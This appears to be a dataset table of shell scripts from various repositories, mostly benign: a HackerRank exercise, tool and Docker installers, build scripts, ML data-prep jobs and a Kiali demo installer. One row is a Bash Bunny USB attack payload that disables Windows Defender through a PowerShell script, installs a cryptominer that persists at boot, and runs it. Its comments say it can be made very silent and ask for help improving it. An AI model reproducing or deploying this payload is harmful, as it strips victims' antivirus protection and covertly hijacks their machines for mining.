blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
9d65ab7dff59c235ff22c7ac013a50c2aad08148 | Shell | csworen/HackerRank_Solutions | /30 Days of Code/Day 3-Intro to Conditional Statements/conditional_bash.bash | UTF-8 | 249 | 2.734375 | 3 | [] | no_license | read n
#if(($n % 2 == 0 & (2 <= $n & $n <= 5 || $n > 20))); then
# echo "Not Weird"
#else
# echo "Weird"
#fi # single `if` block
(($n % 2 == 0 & (2 <= $n & $n <= 5 || $n > 20))) && echo "Not Weird" || echo "Weird"
# ternary solution | true |
ff7df7548e88afddb065bb936efd35fd5b2d350a | Shell | forivall/dotfiles | /install-bins.sh | UTF-8 | 845 | 2.78125 | 3 | [
"ISC"
] | permissive | #!/usr/bin/env zsh
mkdir -p ~/.local/bin
installer="$1"
cmds=(
'corepack enable'
'npm install -g bash-language-server'
'npm install -g npm-name-cli'
'npm install -g chokidar-cli'
'npm install -g js-yaml'
'npm install -g nx'
'npm install -g serve'
'npm install -g git-file-history'
'cargo install bingrep'
'cargo install consoletimer'
'cargo install ddh'
'cargo install dtg'
'cargo install huniq'
'cargo install hx'
'cargo install pueue'
'cargo install runiq'
'cargo install sd'
# 'cargo install sl_cli'
'cargo install toml-cli'
'cargo install viu'
'pip install simple-term-menu'
'pip install termdown'
)
alias pip='python3 -m pip'
for c in $cmds; do
cmd_installer="${${(@s/ /)c}[1]}"
if [[ -n "$installer" && "$cmd_installer" != "$installer" ]]; then continue; fi
echo $c
eval $c
done
| true |
479520a54968eec8d58c96285062dec6b3babf63 | Shell | 00mjk/pe-scripts | /sh/tpsl/glm.sh | UTF-8 | 1,590 | 3.421875 | 3 | [] | no_license | #!/bin/sh
#
# Build and install the GLM library.
#
# Copyright 2019, 2020 Cray, Inc.
####
PACKAGE=glm
VERSIONS='
0.9.6.3:14651b56b10fa68082446acaf6a1116d56b757c8d375b34b5226a83140acd2b2
0.9.9.6:9db7339c3b8766184419cfe7942d668fecabe9013ccfec8136b39e11718817d0
'
_pwd(){ CDPATH= cd -- $1 && pwd; }
_dirname(){ _d=`dirname -- "$1"`; _pwd $_d; }
top_dir=`_dirname \`_dirname "$0"\``
. $top_dir/.preamble.sh
##
## Requirements:
## - unzip
## - cmake
##
unzip >/dev/null 2>&1 \
|| fn_error "requires unzip for source"
cmake --version >/dev/null 2>&1 \
|| fn_error "requires cmake"
test -e glm-$VERSION.zip \
|| $WGET https://github.com/g-truc/glm/releases/download/$VERSION/glm-$VERSION.zip \
|| fn_error "could not fetch source"
echo "$SHA256SUM glm-$VERSION.zip" | sha256sum --check \
|| fn_error "source hash mismatch"
unzip -d glm-$VERSION glm-$VERSION.zip \
|| fn_error "could not unzip source"
cd glm-$VERSION/glm
{ printf "converting to unix line-endings..." ;
find . -type f -exec sed -i 's/
$//' {} \; && echo "done" ; } \
|| fn_error "could not patch line endings"
case $VERSION in
0.9.9.6) patch --reverse -p1 <$top_dir/../patches/glm-cmake-install.patch \
|| fn_error "could not patch source" ;;
esac
cmake \
-DGLM_TEST_ENABLE=OFF \
-DCMAKE_CXX_COMPILER:STRING=CC \
-DCMAKE_CXX_FLAGS="$CFLAGS" \
-DCMAKE_INSTALL_LIBDIR=lib \
-DCMAKE_INSTALL_PREFIX=$prefix \
|| fn_error "configuration failed"
make install \
|| fn_error "build failed"
fn_checkpoint_tpsl
# Local Variables:
# indent-tabs-mode:nil
# sh-basic-offset:2
# End:
| true |
7a3824217e483efef29d64f1da8b96fd6b13368b | Shell | halobrain/knode | /docker/dockercode/docker_setup.sh | UTF-8 | 1,729 | 2.71875 | 3 | [] | no_license | # bash/sh
echo "Docker set for dev environment"
sudo apt-get update
read -p "<<< If above is good to go, Press ENTER to continue. otherwise press ctrl+c >>>"
echo "sudo apt install apt-transport-https ca-certificates curl software-properties-common"
sudo apt install apt-transport-https ca-certificates curl software-properties-common
read -p "Press ENTER to continue"
echo "curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -"
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
read -p "Press ENTER to continue"
echo "sudo apt-key fingerprint 0EBFCD88"
sudo apt-key fingerprint 0EBFCD88
read -p "Press ENTER to continue"
echo "sudo add-apt-repository deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
read -p "Press ENTER to continue"
echo "apt-cache policy docker-ce"
apt-cache policy docker-ce
read -p "<<< If above is good to go, Press ENTER to continue. otherwise press ctrl+c >>>"
echo "sudo apt-get update"
sudo apt-get update
read -p "<<< If above is good to go, Press ENTER to continue. otherwise press ctrl+c >>>"
echo "apt-get install docker-ce docker-ce-cli containerd.io"
sudo apt-get install docker-ce docker-ce-cli containerd.io
read -p "<<< If above is good to go, Press ENTER to continue. otherwise press ctrl+c >>>"
echo "docker pull hello-world"
sudo docker pull hello-world
read -p "<<< If above is good to go, Press ENTER to continue. otherwise press ctrl+c >>>"
echo "docker run hello-world"
sudo docker run hello-world
read -p "Press ENTER to END"
echo "Docker setup completed"
| true |
56129d6e39b9890418bfc838367f485104664bcb | Shell | Rinilyn/bashbunny-payloads | /payloads/library/exploitation/USB Persistent CPU-Miner/payload.txt | UTF-8 | 2,177 | 3.171875 | 3 | [] | no_license | #!/bin/bash
#
# Title: USB Persistent CPU-Miner
# Author: Rinilyn
# Version: 0.1
# Target: Windows 7-10
# Category: Exploiting Resources
# I would like to thank mainly Ar1k88. His payload inspired me to start such a project and i wanted to improve it.
# Also thank you to C1PH3R for letting me use his Anti-AV script.
#
# Description: This payload will immeadiatly run a miner via powershell but will also install the same miner so that it can be used after
# restart. The payload is not yet complete because AV might detect the miner at boot and remove it.
#
# Contribution: We hope to see this payload as efficient as possible and add as much features as possible to it. Feel free to
# Edit/Add or Modify anything you see fit and you will be thanked for your contribution!
#
# How it works: The bunny will start by killing AV and after that it will run a non-silent process of the cpu miner and then silently install
# the miner with all its files to your pc for startup.I cannot teach you how to run the miner silently.Please do not add silence when contributing to it.
# If you wish to contribute,please follow this link and help me make it better:
#
# https://github.com/Rinilyn/USB-Persistent-CPU-Miner
#
# CONFIGURATION:
#
# You must read and apply what the README file says. Otherwise the payload will not work.
#
# This payload is not very LED friendly,and a little poorly made. But the attack Works! It is fast and can be made VERY silent.
# Do not abuse the force!
LED START
Q DELAY 300
ATTACKMODE HID RO_STORAGE
LED ATTACK
#Disable AntiVirus (Windows Defender)
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"
Q DELAY 5000
# Installing the miner silently at boot
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\PersBunnyMiner.exe')"
Q DELAY 5000
# Running the non-silent miner
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')"
Q DELAY 5000
LED FINISH | true |
3d37b98d31924f39e1062e8e222ba9713849bf83 | Shell | Wh1t3Rose/CSGO-RETAKES | /scripts/setup.sh | UTF-8 | 1,775 | 3.5625 | 4 | [] | no_license | #!/bin/bash
server_dir="$HOME/csgo_retakes/csgo"
configs="$HOME/github/CSGO-RETAKES/csgo/addons/sourcemod/configs/"
cd_dir="eval cd "$HOME/github/CSGO-RETAKES/csgo/""
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
echo -e "${RED}Removing Existing Addons Directory if Applicable. If You Don't Have an installed server to csgo_retakes, then this will Do nothing and is safe. Script will continue in 10 Secs...${NC}" && sleep 10
rm -rf $server_dir/addons
# make addons folder
test -e $server_dir/addons || mkdir $server_dir/addons
# metamod
echo -e "${GREEN}Installing Metamod...${NC}" && sleep 2
for dest in $server_dir/addons
do
cp -rf $HOME/github/CSGO-RETAKES/csgo/addons/metamod $dest
cp -rf $HOME/github/CSGO-RETAKES/csgo/addons/metamod.vdf $dest
done
# sourcemod
echo -e "${GREEN}Downloading & Installing Sourcemod...${NC}" && sleep 2
url=$(curl -s https://sm.alliedmods.net/smdrop/1.8/sourcemod-latest-linux)
wget "https://sm.alliedmods.net/smdrop/1.8/$url"
tar -xvzf "${url##*/}" -C $server_dir
echo -e "${GREEN}Copying Over Pre-Configured SourceMod Config & Plugins...${NC}" && sleep 2
for dest in $server_dir/addons/
do
cp -rf $HOME/github/CSGO-RETAKES/csgo/addons/sourcemod $dest
done
echo -e "${GREEN}Copying Over Pre-Configured Config Files...${NC}" && sleep 2
# cfg files
rm -rf "$configs\database.cfg" "$configs\admins.cfg" "$configs\admin_groups.cfg"
for dest in $server_dir/cfg/
do
cp -rf $HOME/github/CSGO-RETAKES/csgo/cfg/sourcemod $dest
cp -rf $HOME/github/CSGO-RETAKES/csgo/cfg/* $dest
done
# Copy start script and start server
echo -e "${GREEN}Copying Over Start Script and Starting Server...${NC}" && sleep 5
for dest in $HOME/csgo_retakes
do
cp -rf $HOME/github/CSGO-RETAKES/scripts/start.sh $dest && cd $dest && sh start.sh
done
| true |
6f6d233bbc0895d1d78e87d69050d93dc199e6d3 | Shell | thomhastings/bt5-scripts | /git-rip-off-kali.sh | UTF-8 | 224 | 2.96875 | 3 | [
"BSD-3-Clause"
] | permissive | for LINE in `curl http://git.kali.org/gitweb/?a=project_index | sort`
do
if [ ! -e "tails/kali/`echo $LINE | awk -F. '{print $1}'`" ]
then
git clone git://git.kali.org/$LINE
else
cd $LINE
git pull
cd ..
fi
done
| true |
fb7937f388a371bf25db82ac962776bcaa38bdfd | Shell | radford/plenv-pmset | /libexec/plenv-pmset | UTF-8 | 1,811 | 3.921875 | 4 | [
"LicenseRef-scancode-public-domain"
] | permissive | #!/usr/bin/env bash
set -e
PLENV_PMSET_VERSION="0.3.0"
# Provide plenv completions
if [ "$1" = "--complete" ]; then
if [ -z "$2" ]; then
echo "active"
echo "create"
echo "delete"
echo "file"
echo "list"
echo "version"
exit
else
pmset_completion=1
shift
fi
fi
if [ "$1" = "version" ] || [ "$1" = "--version" ]; then
if [ -n "$pmset_completion" ]; then
exit
fi
echo "plenv-pmset ${PLENV_PMSET_VERSION}"
echo "Original Ruby version by Jamis Buck <jamis@jamisbuck.org>"
echo "http://github.com/jamis/rbenv-gemset"
echo "Perl port by Jim Radford <jim@jimradford.org>"
echo "http://github.com/radford/plenv-pmset"
exit
fi
resolve_link() {
$(type -p greadlink readlink | head -1) $1
}
abs_dirname() {
local cwd="$(pwd)"
local path="$1"
while [ -n "$path" ]; do
cd "${path%/*}"
local name="${path##*/}"
path="$(resolve_link "$name" || true)"
done
pwd
cd "$cwd"
}
bin_path="$(abs_dirname "$0")"
export PATH="${bin_path}:$PATH"
if [ -z "$PLENV_PMSET_SYSTEM_ROOT" ]; then
export PLENV_PMSET_SYSTEM_ROOT="/usr/local/share/perl-pmsets"
fi
command="$1"
command_path="$(command -v "plenv-pmset-$command" || true)"
if [ -z "$command_path" ]; then
{ echo "version ${PLENV_PMSET_VERSION}"
echo "${0##*/} [command] [options]"
echo
echo "possible commands are:"
echo " active"
echo " create [version] [pmset]"
echo " delete [version] [pmset]"
echo " file"
echo " list"
echo " version"
echo
echo "For full documentation, see: https://github.com/jamis/plenv-pmset#readme"
} >&2
exit 1
fi
shift
if [ -n "$pmset_completion" ] && grep -i "^# provide plenv completions" "$command_path" >/dev/null; then
exec "$command_path" --complete "$@"
elif [ -z "$pmset_completion" ]; then
exec "$command_path" "$@"
fi
| true |
93c09b4414c25ce8ed8ae70d7ef192d03964a495 | Shell | h4ck3rm1k3/awips2 | /tools/devAutoDeploy/devCave/rpm-auto-install-qpid-start.sh | UTF-8 | 1,239 | 3.4375 | 3 | [] | no_license | #!/bin/sh
#----------------------------------------------------------------------
# Auto installation and startup script for a qpid server.
#--------------------------------------------------------------------
PAUSE=8
PID=`/awips2/qpid/sbin/pidof qpidd`
DATE=`date`
echo "**************************************************************************************"
echo "Installing QPID - $DATE"
echo "**************************************************************************************"
echo "awips2_qpidd_cluster installing"
yum groupinstall 'AWIPS II Message Broker Server' -y
echo "**************************************************************************************"
echo "Starting QPID"
echo "**************************************************************************************"
service awips2_qpidd_cluster start
sleep ${PAUSE}
if [ -z "${PID}" ]; then
echo " WARNING: Qpid daemon not running"
let ERROR_COUNT=ERROR_COUNT+1
else
echo " Qpid daemon running"
fi
DATE=`date`
echo "**************************************************************************************"
echo "QPID Completed At $DATE"
echo "**************************************************************************************"
echo ""
exit
| true |
41b0658e5af41a221c69b5dd0d1b922e72a52436 | Shell | swift-lang/swift-t | /dev/mk-src-tgz.sh | UTF-8 | 1,316 | 4.21875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh
set -eu
# MK SRC TGZ
# For Debian package or Spack: Make the upstream or source TGZ
# Used internally by Makefiles for Debian
# Used by dev/build-spacks.sh
# This is used for one individual module at a time:
# ExM c-utils, ADLB/X, Turbine, or STC.
if [ ${#} != 5 ]
then
echo "mk-src-tgz: usage: PKG_TYPE TGZ NAME VERSION FILE_LIST"
echo "mk-src-tgz: given: $*"
exit 1
fi
PKG_TYPE=$1 # Package type: src or deb-dev or deb-bin or spack
TGZ=$2 # Output TGZ file
NAME=$3 # TGZ name
VERSION=$4 # TGZ version
FILE_LIST=$5 # Program that produces list of files to include
echo "Building upstream TGZ for $NAME ..."
# Export PKG_TYPE and DEB_TYPE to FILE_LIST program
export PKG_TYPE=$PKG_TYPE
case $PKG_TYPE in
deb-bin) DEB_TYPE=bin ;;
deb-dev) DEB_TYPE=dev ;;
*) DEB_TYPE="" ;;
esac
export DEB_TYPE
FILES=$( $FILE_LIST )
if [ $PKG_TYPE = deb-dev ]
then
NAME=$NAME-dev
fi
if ! [ -f configure ] || [ configure.ac -nt configure ]
then
./bootstrap
fi
D=$( mktemp -d .$NAME-$DEB_TYPE-tgz-XXX )
mkdir -v $D/$NAME-$VERSION
cp -v --parents $FILES $D/$NAME-$VERSION || \
{
echo ""
echo "mk-src-tgz.sh: " \
"Some file copy failed! See above for error message."
exit 1
}
tar cfz $TGZ -C $D $NAME-$VERSION
echo "Created $PWD $TGZ"
rm -r $D
echo
| true |
381702bd2b32393d0bde22cade24b5c077fabaf1 | Shell | lk668/accumulation | /shell/set_controller.sh | UTF-8 | 555 | 2.78125 | 3 | [] | no_license | echo "Please input the options of the controller status:"
echo "set or del"
read val
case $val in
set)
sudo ovs-vsctl set-controller br-int tcp:10.108.125.20:8700
sudo ovs-vsctl set-controller br-sdn tcp:10.108.125.20:8700
sudo ovs-vsctl set-controller br-extra tcp:10.108.125.20:8700
;;
del)
sudo ovs-vsctl del-controller br-int
sudo ovs-vsctl del-controller br-sdn
sudo ovs-vsctl del-controller br-extra
;;
*)
echo "ERROR: The options input is error"
;;
esac
| true |
a21009a82217e379bd2ed9ccfec472341cfd0dda | Shell | FreddieAkeroyd/epics-seq-build | /runtests.sh | UTF-8 | 614 | 2.765625 | 3 | [] | no_license | #!/bin/sh
set -o errexit
# get one IP address
MYIP=`ipconfig|grep IPv4|awk -F: '{print $2}'|head -1| sed -s 's/ //g'`
# loopback seems to give CAS ioctl errors?
#MYIP=127.0.0.1
#
export EPICS_CA_ADDR_LIST=$MYIP
export EPICS_CA_AUTO_ADDR_LIST=NO
#export EPICS_CA_BEACON_ADDR_LIST=127.255.255.255
#export EPICS_CA_BEACON_ADDR_LIST=${EPICS_CA_ADDR_LIST}
export EPICS_CA_AUTO_BEACON_ADDR_LIST=NO
echo EPICS_CA_ADDR_LIST=${EPICS_CA_ADDR_LIST}
cd $1
# tests hang if we do not launch caRepeater separately
nohup ./epics-base/bin/${EPICS_HOST_ARCH}/caRepeater.exe < /dev/null > /dev/null 2>&1 &
cd seq
make runtests
cd ..
| true |
3b3d93739c898f58d84cd7f5d0216351dbdb86c4 | Shell | bricksdont/embrace-noise | /scripts/aspec/scripts/prepare.sh | UTF-8 | 4,868 | 2.96875 | 3 | [
"MIT"
] | permissive | #! /bin/bash
base=/net/cephfs/home/mathmu/scratch/noise-distill/aspec
basebase=/net/cephfs/home/mathmu/scratch/noise-distill
source $basebase/venvs/sockeye3-cpu/bin/activate
module unuse /apps/etc/modules/start/
module use /sapps/etc/modules/start/
module load generic
data=$base/data
prepared=$base/prepared
mkdir -p $prepared
# subset of models that should be prepared
PREPARE_SUBSET=(
"baseline"
"baseline.reverse"
"noise1"
"noise2"
"noise2-only.filtered"
"noise2-only.dcce.adq.0.25"
"noise2-only.dcce.adq.0.5"
"noise2-only.dcce.adq.0.75"
"noise2-only.mined.score.0.25"
"noise2-only.mined.score.0.5"
"noise2-only.mined.score.0.75"
)
PREPARE_INSTANCE_WEIGHTING_SUBSET=(
"noise2-only.dcce.adq.instance_weighting"
"noise2-only.dcce.adq.instance_weighting.exp0.1"
"noise2-only.dcce.adq.instance_weighting.exp0.2"
"noise2-only.dcce.adq.instance_weighting.exp0.3"
"noise2-only.dcce.adq.instance_weighting.exp0.4"
"noise2-only.dcce.adq.instance_weighting.exp0.5"
"noise2-only.dcce.adq.instance_weighting.exp0.6"
"noise2-only.dcce.adq.instance_weighting.exp0.7"
"noise2-only.dcce.adq.instance_weighting.exp0.8"
"noise2-only.dcce.adq.instance_weighting.exp0.9"
"noise2-only.mined.score.instance_weighting"
"noise2-only.mined.score.instance_weighting.exp1.25"
"noise2-only.mined.score.instance_weighting.exp1.5"
"noise2-only.mined.score.instance_weighting.exp1.75"
"noise2-only.mined.score.instance_weighting.exp2.0"
"noise2-only.mined.score.instance_weighting.exp2.25"
"noise2-only.mined.score.instance_weighting.exp2.5"
"noise2-only.mined.score.instance_weighting.exp2.75"
"noise2-only.mined.score.instance_weighting.exp3.0"
)
PREPARE_TOKEN_WEIGHTING_SUBSET=(
"noise2-only.filtered.token_weighting.exp0.05.geomean"
"noise2-only.filtered.token_weighting.exp0.1.geomean"
"noise2-only.filtered.token_weighting.exp0.2.geomean"
"noise2-only.filtered.token_weighting.exp0.3.geomean"
"noise2-only.filtered.token_weighting.exp0.4.geomean"
"noise2-only.filtered.token_weighting.exp0.5.geomean"
)
function contains() {
local n=$#
local value=${!n}
for ((i=1;i < $#;i++)) {
if [ "${!i}" == "${value}" ]; then
echo "y"
return 0
fi
}
echo "n"
return 1
}
# create baseline.reverse if does not exist
if [[ ! -d $data/baseline.reverse ]]; then
cp -r $data/baseline $data/baseline.reverse
fi
for data_sub in $data/*; do
echo "data_sub: $data_sub"
name=$(basename $data_sub)
if [[ $name == "baseline.reverse" ]]; then
src=ja
trg=en
else
src=en
trg=ja
fi
prepared_sub=$prepared/$name
if [[ -d $prepared_sub ]]; then
echo "Folder exists: $prepared_sub"
echo "Skipping."
continue
fi
if [ $(contains "${PREPARE_SUBSET[@]}" $name) == "n" ]; then
echo "name: $name not in subset that should be prepared"
echo "Skipping."
continue
fi
mkdir -p $prepared_sub
mode=bpe
sbatch --cpus-per-task=1 --time=12:00:00 --mem=16G --partition=generic \
$basebase/scripts/preprocessing/prepare_data_generic.sh \
$data_sub $prepared_sub $src $trg $mode
done
deactivate
source $basebase/venvs/sockeye3-custom-cpu/bin/activate
src=en
trg=ja
for data_sub in $data/*; do
echo "data_sub: $data_sub"
name=$(basename $data_sub)
prepared_sub=$prepared/$name
if [[ -d $prepared_sub ]]; then
echo "Folder exists: $prepared_sub"
echo "Skipping."
continue
fi
if [ $(contains "${PREPARE_INSTANCE_WEIGHTING_SUBSET[@]}" $name) == "n" ]; then
echo "name: $name not in subset that should be prepared"
echo "Skipping."
continue
fi
mkdir -p $prepared_sub
mode=bpe
instance_weighting_type="sentence"
sbatch --cpus-per-task=1 --time=12:00:00 --mem=16G --partition=generic \
$basebase/scripts/preprocessing/prepare_data_instance_weighting_generic.sh \
$data_sub $prepared_sub $instance_weighting_type $src $trg $mode
done
for data_sub in $data/*; do
echo "data_sub: $data_sub"
name=$(basename $data_sub)
prepared_sub=$prepared/$name
if [[ -d $prepared_sub ]]; then
echo "Folder exists: $prepared_sub"
echo "Skipping."
continue
fi
if [ $(contains "${PREPARE_TOKEN_WEIGHTING_SUBSET[@]}" $name) == "n" ]; then
echo "name: $name not in subset that should be prepared"
echo "Skipping."
continue
fi
mkdir -p $prepared_sub
mode=bpe
instance_weighting_type="word"
sbatch --cpus-per-task=1 --time=12:00:00 --mem=16G --partition=generic \
$basebase/scripts/preprocessing/prepare_data_instance_weighting_generic.sh \
$data_sub $prepared_sub $instance_weighting_type $src $trg $mode
done
| true |
b625371e1eb726d248620b7476ff58c7491ec2a8 | Shell | kyukee/dotfiles | /Scripts/rofi-alias.sh | UTF-8 | 239 | 2.75 | 3 | [] | no_license | #!/bin/bash
# Returns a list of aliases in .bashrc, to be used in rofi
cat ~/.bash_aliases | grep alias.*= | awk -F'[ =]' '{print $2}'
# commands that come from a custom path (in this case the folder Scripts)
ls -R ~/Scripts | grep .sh
| true |
bb118cf0eb478aa5898ff659cf0e63714fb52e46 | Shell | emman31/scripts | /config_linux/git_custom_commands/git-merge-to | UTF-8 | 475 | 3.53125 | 4 | [] | no_license | #!/bin/bash
GREEN='\e[0;32m'
CYAN=$'\e[36m'
NC=$'\e[0m' # No Color
CURRENT_BRANCH=$(git rev-parse --abbrev-ref HEAD)
TARGET_BRANCH=$1
git checkout $TARGET_BRANCH
git pull
git status
echo -e "${GREEN}Merging $CURRENT_BRANCH${NC}"
git merge $CURRENT_BRANCH --no-ff
git commit -C HEAD --amend
# for git version 1.7.9+
#git commit --amend --no-edit
read -p "${CYAN}Execute « git quick-push »?${NC}" -n 1 -r
if [[ ! $REPLY =~ ^[Yy]$ ]]
then
exit 1
fi
echo
git quick-push
| true |
c1fb5661705fd751aba269b4fb78b7c73a8568db | Shell | PaulYuuu/docker_rally | /rally_scripts/glance.sh | UTF-8 | 475 | 3.390625 | 3 | [] | no_license | #!/bin/bash
mkdir -p glance/{log,html}
rally_task_dir=../../source/samples/tasks/scenarios
glance_case=`find $rally_task_dir/glance -name "*.yaml"`
for case in $glance_case
do
#Create rally log
name=`echo $case | awk -F "/" '{print $NF}' | cut -d "." -f 1`
rally --log-file glance/log/$name.log task start --task $case
#Create rally report
uuid=`rally task status | awk '{print $2}' | tr -d :`
rally task report $uuid --out glance/html/$name.html
done
| true |
14540f136785311abafc2952942844917abf78db | Shell | mchlvncntry/cs160b | /Module4/mysed | UTF-8 | 900 | 3.859375 | 4 | [] | no_license | #!/bin/bash
# Name: M***V***R***
# Date: November 15, 2019
# File: mysed
# Week: 4, Conditional Statements
# Usage: Appends ’Robert Frost' at the end of the line
# that contains the text, ‘I’ in the given file.
# poem.txt - parameter file
file_entered=$1
word2find='I'
word2append='Robert Frost'
if [ "$#" -eq 0 ]
then
echo "No file supplied."
else
sed "/${word2find}/ s/$/ ${word2append}/" "$file_entered"
echo
fi
| true |
fc5f65ff07998130f9f71d9f5fce6725c69ab579 | Shell | beards/dotfiles | /scripts/installer/debian/clang | UTF-8 | 1,679 | 3.65625 | 4 | [] | no_license | #!/usr/bin/env bash
# this script should be run as root
if [ $EUID -ne 0 ]; then
sudo $0 $@
exit $?
fi
SCRIPT_NAME=${BASH_SOURCE[0]}
CLANG_HOME=/usr/local/src/clang
SRC_DIR=$CLANG_HOME/llvm_src
BUILD_DIR=$CLANG_HOME/build
INSTALL_DIR=/usr/clang
echo -e "#"
echo -e "# $SCRIPT_NAME: install necessary packages"
echo -e "#"
apt-get install -y subversion g++ cmake build-essential libffi-dev
echo -e "#"
echo -e "# $SCRIPT_NAME: checkout llvm"
echo -e "#"
if [ ! -e $SRC_DIR ]; then
mkdir -p $SRC_DIR
cd $SRC_DIR
svn co http://llvm.org/svn/llvm-project/llvm/trunk .
else
cd $SRC_DIR
svn update
fi
echo -e "#"
echo -e "# $SCRIPT_NAME: checkout clang"
echo -e "#"
cd $SRC_DIR/tools
if [ ! -e "clang" ]; then
svn co http://llvm.org/svn/llvm-project/cfe/trunk clang
else
cd clang
svn update
fi
echo -e "#"
echo -e "# $SCRIPT_NAME: checkout extra clang tools"
echo -e "#"
cd $SRC_DIR/tools/clang/tools
if [ ! -e "extra" ]; then
svn co http://llvm.org/svn/llvm-project/clang-tools-extra/trunk extra
else
cd extra
svn update
fi
echo -e "#"
echo -e "# $SCRIPT_NAME: checkout compiler-rt"
echo -e "#"
cd $SRC_DIR/projects
if [ ! -e "compiler-rt" ]; then
svn co http://llvm.org/svn/llvm-project/compiler-rt/trunk compiler-rt
else
cd compiler-rt
svn update
fi
echo -e "#"
echo -e "# $SCRIPT_NAME: config build info"
echo -e "#"
mkdir -p $BUILD_DIR
cd $BUILD_DIR
$SRC_DIR/configure --enable-optimized --disable-assertions --enable-targets=host
echo -e "#"
echo -e "# $SCRIPT_NAME: start building"
echo -e "#"
make -j 4
make update
make check-all
make install
echo -e "#"
echo -e "# $SCRIPT_NAME: done !"
echo -e "#"
| true |
262a944c7bcbaf19b31af61e5266188b249c9544 | Shell | gronki/diskvert-old3 | /sketches/maps2d-1/runall.sh | UTF-8 | 130 | 2.53125 | 3 | [
"MIT"
] | permissive | for d in data.*
do
cd "$d"
cat jobs.lst | parallel -j6 --bar bash ../job.sh
cd ..
echo "$d" >> completed.txt
done
| true |
27d453f999bc0f227fdb86d23803ef1f08453601 | Shell | kiali/kiali | /hack/istio/install-federated-travels-demo.sh | UTF-8 | 5,166 | 3.453125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
##############################################################################
# install-federated-travels-demo.sh
#
# Installs federated travels kiali demo application
# https://github.com/kiali/demos/tree/master/federated-travels
# Works on both openshift and non-openshift environments.
##############################################################################
: ${CLIENT_EXE:=oc}
: ${DELETE_DEMOS:=false}
: ${FTRAVELS:=federated-travels}
: ${BASE_URL:=https://raw.githubusercontent.com/kiali/demos/master}
apply_network_attachment() {
NAME=$1
cat <<NAD | $CLIENT_EXE -n ${NAME} apply -f -
apiVersion: "k8s.cni.cncf.io/v1"
kind: NetworkAttachmentDefinition
metadata:
name: istio-cni
NAD
cat <<SCC | $CLIENT_EXE apply -f -
apiVersion: security.openshift.io/v1
kind: SecurityContextConstraints
metadata:
name: ${NAME}-scc
runAsUser:
type: RunAsAny
seLinuxContext:
type: RunAsAny
supplementalGroups:
type: RunAsAny
users:
- "system:serviceaccount:${NAME}:default"
- "system:serviceaccount:${NAME}:${NAME}"
SCC
}
install_ftravels_app() {
APP="federated-travels"
declare -a arr=("east-mesh-system" "west-mesh-system" "east-travel-agency" "east-travel-portal" "east-travel-control" "west-travel-agency")
for i in "${arr[@]}"
do
if [ "${IS_OPENSHIFT}" == "true" ]; then
${CLIENT_EXE} new-project ${i}
else
${CLIENT_EXE} create namespace ${i}
fi
${CLIENT_EXE} label namespace ${i} istio-injection=enabled --overwrite
done
${CLIENT_EXE} apply -f ${BASE_URL}/${APP}/ossm-subs.yaml
${CLIENT_EXE} apply -n east-mesh-system -f ${BASE_URL}/${APP}/east/east-ossm.yaml
${CLIENT_EXE} apply -n west-mesh-system -f ${BASE_URL}/${APP}/west/west-ossm.yaml
${CLIENT_EXE} wait --for condition=Ready -n east-mesh-system smmr/default --timeout 300s
${CLIENT_EXE} wait --for condition=Ready -n west-mesh-system smmr/default --timeout 300s
${CLIENT_EXE} get configmap istio-ca-root-cert -o jsonpath='{.data.root-cert\.pem}' -n east-mesh-system > east-cert.pem
${CLIENT_EXE} create configmap east-ca-root-cert --from-file=root-cert.pem=east-cert.pem -n west-mesh-system
${CLIENT_EXE} get configmap istio-ca-root-cert -o jsonpath='{.data.root-cert\.pem}' -n west-mesh-system > west-cert.pem
${CLIENT_EXE} create configmap west-ca-root-cert --from-file=root-cert.pem=west-cert.pem -n east-mesh-system
${CLIENT_EXE} apply -n east-mesh-system -f ${BASE_URL}/${APP}/east/east-federation.yaml
${CLIENT_EXE} apply -n west-mesh-system -f ${BASE_URL}/${APP}/west/west-federation.yaml
${CLIENT_EXE} apply -n east-travel-agency -f ${BASE_URL}/${APP}/east/east-travel-agency.yaml
${CLIENT_EXE} apply -n east-travel-portal -f ${BASE_URL}/${APP}/east/east-travel-portal.yaml
${CLIENT_EXE} apply -n east-travel-control -f ${BASE_URL}/${APP}/east/east-travel-control.yaml
${CLIENT_EXE} apply -n west-travel-agency -f ${BASE_URL}/${APP}/west/west-travel-agency.yaml
}
while [ $# -gt 0 ]; do
key="$1"
case $key in
-c|--client)
CLIENT_EXE="$2"
shift;shift
;;
-d|-delete)
DELETE_DEMOS="$2"
shift;shift
;;
-h|--help)
cat <<HELPMSG
Valid command line arguments:
-c|--client: either 'oc' or 'kubectl'
-d|--delete: if 'true' demos will be deleted; otherwise, they will be installed.
-h|--help: this text
HELPMSG
exit 1
;;
*)
echo "Unknown argument [$key]. Aborting."
exit 1
;;
esac
done
IS_OPENSHIFT="false"
if [[ "${CLIENT_EXE}" = *"oc" ]]; then
IS_OPENSHIFT="true"
fi
echo "CLIENT_EXE=${CLIENT_EXE}"
echo "IS_OPENSHIFT=${IS_OPENSHIFT}"
if [ "${DELETE_DEMOS}" != "true" ]; then
echo "Installing the ${FTRAVELS} app in the ${FTRAVELS} namespace..."
install_ftravels_app
else
echo "Deleting the '${FTRAVELS}' app in the '${FTRAVELS}' namespace..."
${CLIENT_EXE} delete -n east-mesh-system -f ${BASE_URL}/${FTRAVELS}/east/east-ossm.yaml
